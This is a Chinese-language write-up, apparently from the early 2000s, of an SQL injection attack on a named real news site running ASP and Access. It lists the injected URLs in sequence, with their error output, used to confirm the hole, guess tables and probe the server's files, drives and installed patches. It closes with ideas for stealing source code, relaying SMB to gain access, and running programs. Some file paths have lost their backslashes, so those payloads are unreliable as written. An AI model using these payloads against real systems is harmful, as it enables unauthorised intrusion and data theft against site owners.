一. 在一次玩sql injection時無意發現了這個漏洞:
1.訪問http://www.lznet.net/news/displaynews.asp?id=24794'
頁面出錯信息:
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e14'
[Microsoft][ODBC Microsoft Access Driver] 字符串的語法錯誤 在查詢表達式 'id = 24794'' 中。
/news/displaynews.asp,行133
2.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 1=1
頁面正常
3.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 1=2
頁面返回"找不到文件"
這是典型的sql injection with access漏洞,接下來猜表名:
4.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from news)
頁面出錯:數據庫引擎找不到輸入表或查詢 'news'
5.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from admin)
頁面出錯:數據庫引擎找不到輸入表或查詢 'admin'
6.突然想起了sql injection技術中得到的出錯信息中表名格式為: news.id
其中news為表名,id為表中的一個列名
7.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from lznet.a)
出錯:找不到文件 'C:WINNTsystem32lznet.mdb'。
8.試遍了web根目錄以及所有知道的虛擬目錄,都下載不到這個lznet.mdb,仔細一看原來是lznet.mdb這個文件名是自己定義的。但是,是什么原因泄露系統目錄的物理路徑呢?繼續試試能不能查詢c:winntsystem32下的cmd.exe文件.
9.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from cmd.exe.a)
這條語句格式是經過多次試驗得到的:)
出錯:"數據庫引擎打不開文件'C:WINNTsystem32CMD.EXE'。 它已經被別的用戶以獨占方式打開,或沒有查看數據的權限。 "
分析以上出錯信息,我想權限是有的,因為我們是基于asp的guest權限,默認cmd.exe是Everyone:R ,如果打不開那就是數據庫不支持了,但是文件夾是可以被數據庫訪問,否則我們是搜索不到其中的文件的。
10.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from c:cmd.exe.a)
在這里我們可以看到跨目錄查詢是可行的
出錯:
找不到文件 'c:cmd.exe'。
11.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from c:oot.ini.a)
注:boot.ini是win2000在系統盤根目錄下的系統引導文件
出錯:
據庫引擎打不開文件'c:oot.ini'。 它已經被別的用戶以獨占方式打開,或沒有查看數據的權限。
12.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from d:oot.ini.a)
跨盤符查詢也是可行的
出錯:
找不到文件 'd:oot.ini'。
13.訪問http://www.lznet.net/news/displaynews.asp?id=24794 and 0<>(select count(*) from i:oot.ini.a)
出錯:
'i:oot.ini'不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否連接到文件存放的服務器。
注:我們看到出錯信息很老實的告訴了我們這個系統沒有i盤,從側面說access的出錯信息在某些方面還是比較詳細的。
14.這是個比較實際的利用,如果對方是從spx打到spx,在winnt目錄下就會有這些文件,我們可以通過這個漏洞查找這些文件,確定目錄主機打補丁的情況:
[$NtUninstallQ329553$] [$NtUninstallQ329834$]
[$NtUninstallQ331953$] [$NtUninstallQ810833$]
[$NtUninstallQ811114$] [$NtUninstallQ811493$]
[$NtUninstallQ815021$] [$NtUninstallSP2SRP1$]
……………
二.漏洞的利用設想:
1.查詢某個動態網頁文件,利用查詢語句獲取動態網頁的源代碼,比如讀取文件內容并把內容寫入到表的一個列里,然后用len暴力猜列里的內容,從而得到源碼。
2.猜測目錄的位置、文件名等等,了解對方的一點主機信息,比如說系統安裝在哪個分區上,共有幾個分區以及系統打的什么補丁等等。
3.查詢unc路徑,如\1.1.1.1sharea.vbs,而\1.1.1.1運行著smbrelay,我們利用smb重定向技術有能會得到一個guest權限的ipc連接,這就有意思多了。
4.查找敏感文件,比如*.cif,*.mdb等等,但是我沒有實現在access上使用通配符查詢文件,可能是因為我是數據庫新手的問題。
5.執行文件,可以的話就發財了.
6.以上設想可能有理解錯誤正在驗證中(你想到什么就告訴我吧)
有關我對這個漏洞的理解:
access對表和列的查詢存在問題,如果我們構造一個畸型表名的話,access找不到這樣的表就會當成mdb文件去查找,如果構造得當,就會當成一個文件去到硬盤上查找!(默認在system32下查找。我在sql server也簡單測試了一下,沒有發現這個問題。另外利用這個漏洞需要兩個條件(怕有的人不理解):
(1)對方是asp+access應用體系,并且asp代碼存在過濾不足的問題使我們可以遠程注射sql語句。
(2)asp要能顯示查詢失敗的詳細信息,比如"數據庫引擎找不到輸入表或查詢 'news'"。否則我們無論查詢是否成功都變的沒有意義。
